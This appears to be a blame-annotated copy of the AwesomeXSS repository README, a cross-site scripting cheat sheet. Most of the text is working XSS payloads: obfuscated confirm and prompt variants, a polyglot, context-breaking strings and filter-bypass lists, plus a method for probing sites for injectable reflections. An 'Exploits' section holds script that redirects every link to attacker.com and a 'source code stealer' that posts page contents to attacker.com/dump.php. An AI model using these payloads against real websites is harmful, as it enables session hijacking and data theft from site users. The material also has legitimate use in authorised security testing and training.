2018-03-11 14:35:30 +00:00
# AwesomeXSS
2018-03-11 15:51:25 +00:00
Awesome XSS stuff .
Put this repo on watch . I will be updating it regularly .
2018-03-11 16:04:00 +00:00
2018-03-11 15:51:25 +00:00
# # # Awesome Books
2018-03-23 16:18:12 +00:00
- [ XSS Cheat Sheet By Brute Logic ] ( https : //leanpub.com/xss)
2018-03-11 15:51:25 +00:00
# # # Awesome Websites
- [ brutelogic . com . br ] ( http : //brutelogic.com.br)
- [ respectxss . blogspot . in ] ( https : //respectxss.blogspot.in/)
2018-03-22 08:08:43 +00:00
# # # Awesome Challenges
- [ Google ' s XSS Challenge ] ( https : //xss-game.appspot.com/)
- [ prompt ( 1 ) to win ] ( http : //prompt.ml/)
2018-03-11 15:51:25 +00:00
# # # Awesome People
- [ Rodolfo Assis ] ( https : //twitter.com/brutelogic)
- [ Ashar Javed ] ( https : //twitter.com/soaj1664ashar)
2018-03-12 08:06:37 +00:00
- [ Somdev Sangwan ] ( https : //twitter.com/s0md3v) because I made this repo :3
2018-03-11 15:51:25 +00:00
2018-03-22 08:08:43 +00:00
# # # Awesome Reads & Presentations
- [ XSS in Sarahah ] ( http : //www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)
2018-03-22 13:25:39 +00:00
- [ Bypass Any WAF for XSS ] ( https : //teamultimate.in/bypass-waf-xss-easily/)
2018-03-22 08:08:43 +00:00
- [ XSS in Facebook via PNG Content Type ] ( https : //whitton.io/articles/xss-on-facebook-via-png-content-types/)
2018-03-22 13:22:33 +00:00
- [ How I met your girlfriend ] ( https : //www.youtube.com/watch?v=fWk_rMQiDGc)
- [ How to Find 1 , 352 Wordpress XSS Plugin Vulnerabilities in one hour ] ( https : //www.youtube.com/watch?v=9ADubsByGos)
2018-03-11 15:51:25 +00:00
- [ Blind XSS ] ( https : //www.youtube.com/watch?v=OT0fJEtz7aE)
- [ Copy Pest ] ( https : //www.slideshare.net/x00mario/copypest)
2018-03-12 08:06:37 +00:00
# # # Awesome Tools
2018-05-09 07:01:14 +00:00
- [ XSStrike ] ( https : //github.com/UltimateHackers/XSStrike)
2018-03-12 08:06:37 +00:00
- [ KNOXSS ] ( http : //knoxss.me/)
2018-03-21 09:44:55 +00:00
- [ BeEF ] ( https : //github.com/beefproject/beef)
- [ JShell ] ( https : //github.com/UltimateHackers/JShell)
2018-03-12 08:06:37 +00:00
2018-03-22 13:04:27 +00:00
# # # Awesome Payloads
` ` `
2018-06-05 16:17:49 +00:00
< details open ontoggle = confirm ( ) >
2018-07-28 17:56:15 +00:00
< script y = "><" > /*<script* */ prompt ( ) < / s c r i p t
< w = "/x=" y > " / ondblclick = ` < ` [ confir\u006d ` ` ] > z
2018-06-05 16:17:49 +00:00
< a href = "javascript%26colon;alert(1)" > click
2018-09-12 16:46:02 +00:00
< a href = javas & # 99 ; ript : alert ( 1 ) > click
2018-04-04 09:42:25 +00:00
< script / "<a" / src = data : = " . < a , [ 8 ] . some ( confirm ) >
2018-06-05 16:17:49 +00:00
< svg / x = ">" / onload = confirm ( ) //
2018-04-04 09:42:25 +00:00
< -- ` <img/src= ` onerror = confirm ` ` > -- ! >
2018-03-22 13:04:27 +00:00
< svg % 0 Aonload = % 09 ( ( pro\u006dpt ) ) ( ) //
< sCript x > ( ( ( confirm ) ) ) ` ` < / s c R i p t x >
< svg < / o n l o a d = " 1 > ( _ = p r o m p t , _ ( 1 ) ) " " >
2018-07-28 17:56:15 +00:00
<!-- > < script src = //14.rs>
2018-03-22 13:04:27 +00:00
< embed src = //14.rs>
< script x = ">" src = //15.rs></script>
< ! '/*"/*/' /*/"/*--></Script><Image SrcSet=K */ ; OnError = confirm ` 1 ` //>
< iframe / src \ / \ / onload = prompt ( 1 )
< x oncut = alert ( ) > x
< svg onload = write ( ) >
` ` `
2018-03-22 13:15:06 +00:00
Here ' s an interesting XSS polyglot by [ Ahmed Elsobky ] ( https : //github.com/0xsobky/):
` ` `
jaVasCript : /*-/*`/*\`/*'/*"/**/ ( /* */ oNcliCk = alert ( ) ) //%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
` ` `
# # # Awesome Tags & Event Handlers
- [ 105 Event Handlers with description ] ( https : //github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [ 200 Event Handlers without description ] ( http : //pastebin.com/raw/WwcBmz5J)
2018-03-22 13:04:27 +00:00
Some HTML Tags that you will be using
` ` `
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
` ` `
2018-03-11 15:51:25 +00:00
# # # Awesome Context Breaking
# # # # Simple Context
` ` `
< svg onload = alert ( ) >
< / t a g > < s v g o n l o a d = a l e r t ( ) >
` ` `
# # # # Attribute Context
` ` `
" > < svg onload = alert ( ) >
"><svg onload=alert()><b attr="
" onmouseover=alert() "
" onmouseover = alert ( ) //
2018-05-07 03:51:55 +00:00
"autocous/onfocus=" alert ( )
2018-03-11 15:51:25 +00:00
` ` `
# # # # JavaScript Context
` ` `
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
< / s c r i p t > < s v g o n l o a d = a l e r t ( ) >
` ` `
2018-03-21 06:48:10 +00:00
# # # Awesome Confirm Variants
Yep , confirm because alert is too mainstream .
` ` `
confirm ( )
confirm ` `
( ( ( confirm ) ) ) ` `
2018-03-29 07:07:37 +00:00
co\u006efirm ( )
2018-03-21 06:48:10 +00:00
new class extends confirm ` ` { }
2018-04-04 09:42:25 +00:00
[ 8 ] . find ( confirm )
[ 8 ] . map ( confirm )
[ 8 ] . some ( confirm )
[ 8 ] . every ( confirm )
[ 8 ] . filter ( confirm )
[ 8 ] . findIndex ( confirm )
2018-03-21 06:48:10 +00:00
` ` `
2018-03-11 16:04:00 +00:00
# # # Awesome Exploits
2018-10-21 06:12:09 +00:00
# # # # # Replace all links
` ` ` javascript
Array . from ( document . getElementsByTagName ( "a" ) ) . forEach ( function ( i ) {
i . href = "https://attacker.com" ;
} ) ;
` ` `
2018-06-03 05:59:31 +00:00
# # # # # Source Code Stealer
` ` ` javascript
var request = new XMLHttpRequest ( ) ;
request . open ( "GET" , url , true ) ;
request . send ( ) ;
request . onreadystatechange = function ( ) {
if ( request . readyState == 4 )
response = request . responseText ;
var dump = new XMLHttpRequest ( ) ;
dump . open ( "POST" , "attacker.com/dump.php" , true )
dump . send ( response ) ;
}
` ` `
2018-03-21 06:48:10 +00:00
A good compilation of advanced XSS exploits can be found [ here ] ( http : //www.xss-payloads.com/payloads-list.html?a#category=all)
2018-03-11 15:51:25 +00:00
2018-03-12 08:06:37 +00:00
# # # Awesome Probing
If nothing of this works , take a look at * * Awesome Bypassing * * section
First of all , enter a non - malicious string like * * d3v * * and look at the source code to get an idea about number and contexts of refelections .
2018-03-21 08:14:41 +00:00
< br > Now for attribute context , check if double quotes ( ") are being filtered by entering **x" d3v * * . If it gets altered to * * x & amp ; quot ; d3v * * , chances are that proper security measures are in place . If this happens , try doing the same for single quotes ( ') by entering **x' d3v * * , if it gets altered to * * x & amp ; apos ; * * , you are doomed . The only thing you can try is encoding . < br >
2018-03-12 08:06:37 +00:00
If the quotes are not being filtered , you can simply try payloads from * * Awesome Context Breaking * * section .
< br > For javascript context , check which quotes are being used for example if they are doing
` ` `
variable = 'value' or variable = "value"
` ` `
2018-03-21 09:44:55 +00:00
Now lets say single quotes ( ') are in use, in that case enter **x' d3v * * . If it gets altered to * * x \ \ 'd3v**, try escaping the backslash (\) by adding a backslash to your probe i.e. **x\\' d3v * * . If it works use the following payload :
2018-03-12 08:06:37 +00:00
` ` `
2018-09-13 20:36:47 +00:00
\ ' - alert ( ) //
2018-03-12 08:06:37 +00:00
` ` `
2018-10-24 02:59:40 +00:00
But if it gets altered to * * x \ \ \ \ ' d3v * * , the only thing you can try is closing the script tag itself by using
2018-03-12 08:06:37 +00:00
` ` `
< / s c r i p t > < s v g o n l o a d = a l e r t ( ) >
` ` `
2018-03-21 08:14:41 +00:00
For simple HTML context , the probe is * * x & gt ; d3v * * . If it gets altered to * * x & amp ; gt ; d3v * * , proper sanitization is in place . If it gets reflected as it as , you can enter a dummy tag to check for potenial filters . The dummy tag I like to use is * * x & lt ; xxx & gt ; * * . If it gets stripped or altered in any way , it means the filter is looking for a pair of * * < * * and * * > * * . It can simply bypassed using
2018-03-12 08:06:37 +00:00
` ` `
< svg onload = alert ( ) //
` ` `
or this ( it will not work in all cases )
` ` `
< svg onload = alert ( )
` ` `
If the your dummy tags lands in the source code as it is , go for any of these payloads
` ` `
< svg onload = alert ( ) >
< embed src = //14.rs>
< details open ontoggle = alert ( ) >
` ` `
# # # Awesome Bypassing
2018-03-21 09:44:55 +00:00
* * Note : * * None of these payloads use single ( ' ) or double quotes ( " ) .
- Without event handlers
` ` `
< object data = javascript : confirm ( ) >
2018-04-04 11:25:43 +00:00
< a href = javascript : confirm ( ) > click here
< script src = //14.rs></script>
2018-03-21 09:44:55 +00:00
< script > confirm ( ) < / s c r i p t >
` ` `
- Without space
` ` `
< svg / onload = confirm ( ) >
2018-04-04 11:25:43 +00:00
< iframe / src = javascript : alert ( 1 ) >
2018-03-21 09:44:55 +00:00
` ` `
- Without slash ( / )
` ` `
< svg onload = confirm ( ) >
< img src = x onerror = confirm ( ) >
` ` `
- Without equal sign ( = )
` ` `
< script > confirm ( ) < / s c r i p t >
` ` `
- Without closing angular bracket ( > )
` ` `
< svg onload = confirm ( ) //
` ` `
- Without alert , confirm , prompt
` ` `
2018-03-22 08:08:43 +00:00
< script src = //14.rs></script>
2018-03-21 09:44:55 +00:00
< svg onload = co\u006efirm ( ) >
< svg onload = z = co\u006efir\u006d , z ( ) >
` ` `
- Without a Valid HTML tag
` ` `
< x onclick = confirm ( ) > click here
2018-04-04 11:25:43 +00:00
< x ondrag = aconfirm ( ) > drag it
` ` `
2018-10-24 03:14:16 +00:00
- Bypass tag blackilisting
` ` `
< / S c R i p T >
< / s c r i p t
< /script/ >
< / s c r i p t x >
` ` `
2018-04-04 11:25:43 +00:00
* * Filter bypass procedure by [ Rodolfo Assis ] ( https : //twitter.com/rodoassis)**
` ` `
< x onxxx = 1
% 3 Cx onxxx = 1
< % 78 onxxx = 1
< x % 6 Fnxxx = 1
< x o % 6 Exxx = 1
< x on % 78 xx = 1
< x onxxx % 3 D1
< X onxxx = 1
< x ONxxx = 1
< x OnXxx = 1
< X OnXxx = 1
< x onxxx = 1 onxxx = 1
< x / onxxx = 1
< x % 09 onxxx = 1
< x % 0 Aonxxx = 1
< x % 0 Conxxx = 1
< x % 0 Donxxx = 1
< x % 2 Fonxxx = 1
< x 1 = '1' onxxx = 1
< x 1 = "1" onxxx = 1
< x < / o n x x x = 1
< x 1 = ">" onxxx = 1
< http : //onxxx%3D1/
< x % 2 F1 = " > % 22 OnXxx % 3 D1
2018-03-21 09:44:55 +00:00
` ` `
2018-03-11 15:51:25 +00:00
2018-03-22 13:22:33 +00:00
# # # Awesome Encoding
Come back later
2018-03-11 15:51:25 +00:00
# # # Awesome Tips & Tricks
2018-03-29 07:07:37 +00:00
- http ( s ) : // can be shortened to // or /\\.
2018-03-11 15:51:25 +00:00
- * * document . cookie * * can be shortened to * * cookie * * . It applies to other DOM objects as well .
2018-03-21 09:44:55 +00:00
- alert and other pop - up functions don 't need a value, so stop doing **alert(' XSS ' ) * * and start doing * * alert ( ) * *
- You can use * * //** to close a tag instead of **>**.
2018-03-11 16:05:42 +00:00
- I have found that * * confirm * * is the least detected pop - up function so stop using * * alert * * .
2018-03-22 13:42:23 +00:00
- Quotes around attribute value aren 't neccessary as long as it doesn' t contain spaces . You can use * * & lt ; script src = //14.rs>** instead of **<script src="//14.rs">**
2018-03-21 09:44:55 +00:00
- The shortest independent "XSS" payload is * * & lt ; embed src = //14.rs>** (19 chars)
2018-03-11 16:04:00 +00:00
2018-03-12 11:25:26 +00:00
# # # Awesome Credits
2018-03-11 16:04:00 +00:00
All the payloads are crafted by me unless specified .
2018-04-04 11:25:43 +00:00
Thanks to my big brother [ Rodolfo Assis ] ( https : //twitter.com/rodoassis) whose writings inspired me to become an XSSLord.